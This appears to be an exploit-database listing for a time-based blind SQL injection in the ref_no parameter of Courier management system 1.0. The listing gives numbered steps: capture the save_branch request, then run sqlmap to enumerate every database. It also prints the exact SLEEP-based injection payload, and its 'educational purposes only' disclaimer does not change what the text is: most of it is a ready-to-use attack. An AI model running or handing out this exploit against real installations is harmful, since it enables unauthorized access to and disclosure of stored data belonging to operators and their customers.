Courier management system 1.0 ref_no sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-12-11 |
Type : webapps |
Platform : php
This exploit / vulnerability Courier management system 1.0 ref_no sql injection is for educational purposes only and if it is used you will do on your own risk!
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page inburpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents
---
Parameter: ref_no (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND
'knst'='knst
---
Courier management system 1.0 ref_no sql injection